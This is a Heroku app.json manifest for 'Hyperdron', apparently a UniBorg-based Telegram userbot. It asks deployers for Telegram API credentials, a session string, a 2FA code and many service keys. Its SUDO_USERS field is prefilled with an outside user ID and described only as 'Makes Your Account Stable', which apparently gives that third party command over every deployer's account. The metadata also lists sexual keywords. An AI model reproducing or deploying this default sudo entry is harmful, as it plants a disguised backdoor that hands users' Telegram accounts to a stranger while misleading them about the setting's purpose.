{
  "name": "Hyperdron",
  "description": "Only For Legends..... By : @theRay1s",
  "logo": "https://telegra.ph/file/4924b0b6403ab81c354f4.jpg",
  "keywords": [
    "sex",
    "porn",
    "xxx",
    "dick",
    "vagina",
    "boobs"
  ],
  "repository": "https://gitlab.com/SpEcHiDe/UniBorg",
  "website": "https://telegram.dog/UniBorg",
  "success_url": "https://telegram.dog/theRay1",
  "env": {
    "ENV": {
      "description": "Setting this to ANYTHING will enable environment variables.",
      "value": "ANYTHING"
    },
    "APP_ID": {
      "description": "Get this value from my.telegram.org! Please do not steal",
      "value": ""
    },
    "API_HASH": {
      "description": "Get this value from my.telegram.org! Please do not steal",
      "value": ""
    },
    "HU_STRING_SESSION": {
      "description": "Get this value by running python3 GenerateStringSession.py locally",
      "value": ""
    },
    "OPEN_WEATHER_MAP_APPID": {
      "description": "Get your own APPID from https://api.openweathermap.org/data/2.5/weather",
      "required": false
    },
    "SCREEN_SHOT_LAYER_ACCESS_KEY": {
      "description": "Get your own ACCESS_KEY from http://api.screenshotlayer.com/api/capture",
      "required": false
    },
    "PRIVATE_GROUP_BOT_API_ID": {
      "description": "Send .get_id in any group to fill this value.",
      "value": "-100",
      "required": false
    },
    "PRIVATE_CHANNEL_BOT_API_ID": {
      "description": "Send .get_id in any channel to fill this value. ReQuired for @Manuel15 inspiration to work!",
      "value": "-100",
      "required": false
    },
    "TMP_DOWNLOAD_DIRECTORY": {
      "description": "This is required for the plugins involving the file system.",
      "value": "./theRay1s/",
      "required": false
    },
    "IBM_WATSON_CRED_USERNAME": {
      "description": "This is required for the speech to text module. Get your USERNAME from https://console.bluemix.net/docs/services/speech-to-text/getting-started.html",
      "required": false
    },
    "IBM_WATSON_CRED_PASSWORD": {
      "description": "This is required for the speech to text module. Get your PASSWORD from https://console.bluemix.net/docs/services/speech-to-text/getting-started.html",
      "required": false
    },
    "HASH_TO_TORRENT_API": {
      "description": "This is required for the hash to torrent file functionality to work.",
      "value": "https://example.com/torrent/{}",
      "required": false
    },
    "TELEGRAPH_SHORT_NAME": {
      "description": "This is required for the @telegraph functionality.",
      "value": "UniBorg",
      "required": false
    },
    "OCR_SPACE_API_KEY": {
      "description": "Get an API Key from http://OCR.Space",
      "required": false
    },
    "G_BAN_LOGGER_GROUP": {
      "description": "Send .get_id in any group with all your administration bots (added)",
      "value": "-100",
      "required": false
    },
    "TG_GLOBAL_ALBUM_LIMIT": {
      "description": "How many media should appear when you do a .google image search? (setting a low value is preferred)",
      "value": "9",
      "required": false
    },
    "TG_BOT_TOKEN_BF_HER": {
      "description": "Obtain a Telegram bot token by contacting @BotFather",
      "required": false
    },
    "TG_BOT_USER_NAME_BF_HER": {
      "description": "Obtain a Telegram bot @username by contacting @BotFather",
      "required": false
    },
    "REM_BG_API_KEY": {
      "description": "Get your own API key from https://www.remove.bg/ or feel free to use http://telegram.dog/Remove_BGBot",
      "required": false
    },
    "NO_P_M_SPAM": {
      "description": "Set to True if you want to block users that are spamming your PMs.",
      "required": false
    },
    "MAX_FLOOD_IN_P_M_s": {
      "description": "Define the number of consecutive messages a new user can send to your P.M. This should be a valid Integer.",
      "required": false
    },
    "NC_LOG_P_M_S": {
      "description": "set to True if you want to log PMs to your PM_LOGGR_BOT_API_ID",
      "required": false
    },
    "PM_LOGGR_BOT_API_ID": {
      "description": "send .get_id in any channel to forward all your NEW PMs to this group",
      "required": false
    },
    "NO_OF_BUTTONS_DISPLAYED_IN_H_ME_CMD": {
      "description": "Number of rows of modules that needs to be displayed in the .helpme command",
      "required": false
    },
    "COMMAND_HAND_LER": {
      "description": "specify command handler that should be used for the plugins. This should be a valid \"regex\" pattern",
      "required": false
    },
    "SUDO_USERS": {
      "description": "Makes Your Account Stable.",
      "value": "138312364",
      "required": false
    },
    "TZ": {
      "description": "set your default time zone for time related features to work correctly. Value should match the string here: https://en.wikipedia.org/wiki/List_of_tz_database_time_zones",
      "required": false
    },
    "VERY_STREAM_LOGIN": {
      "description": "Get your API key from https://verystream.com",
      "required": false
    },
    "VERY_STREAM_KEY": {
      "description": "Get your API key from https://verystream.com",
      "required": false
   },
    "G_DRIVE_CLIENT_ID": {
      "description": "Get your credentials from https://da.gd/so63O",
      "required": false
    },
    "G_DRIVE_CLIENT_SECRET": {
      "description": "Get your credentials from https://da.gd/so63O",
      "required": false
      },
      "GDRIVE_FOLDER_ID": {
      "description": "Get your gdrive folder link in which you want to save file.",
      "required": false
    },
    "AUTH_TOKEN_DATA": {
      "description": "This is required for gdrive to work.",
      "value": "blahblah",
      "required": false
    },
    "DATA_DIRECTORY": {
      "description": "I dunno y is it for but it is necessary for my repo.",
      "value": "data",
      "required": false
    },
    "FF_MPEG_DOWN_LOAD_MEDIA_PATH": {
      "description": "blah blah blah.",
      "value": "./uniborg.media.ffmpeg/",
      "required": false
    },
    "GITHUB_ACCESS_TOKEN": {
      "description": "This is required for commit functionality to work.",
      "required": false
    },
    "GIT_REPO_NAME": {
      "description": "This is required for commit functionality to work.",
      "required": false
    },
    "OPEN_LOAD_KEY": {
      "description": "I dunno but my repo needs it, u can type 100.",
      "required": false
    },
    "OPEN_LOAD_LOGIN": {
      "description": "Same Description As Above.",
      "required": false
    },
    "TEMP_DIR": {
      "description": ":p",
      "value": "Env",
      "required": false
    },
    "UB_BLACK_LIST_CHAT": {
      "description": "haha",
      "value": "-100",
      "required": false
    },
    "TELE_GRAM_2FA_CODE": {
      "description": "Your Telegram 2FA code as a string",
      "required": false
    }
  },
  "addons": [{
    "plan": "heroku-postgresql",
    "options": {
      "version": "9.5"
    }
  }],
  "buildpacks": [{
    "url": "https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest"
  }, {
    "url": "https://github.com/opendoor-labs/heroku-buildpack-p7zip"
  }, {
    "url": "https://github.com/amivin/aria2-heroku"
  }, {
    "url": "https://github.com/heroku/heroku-buildpack-google-chrome"
  }, {
    "url": "https://github.com/heroku/heroku-buildpack-chromedriver"
  }, {
    "url": "heroku/python"
  }]
}
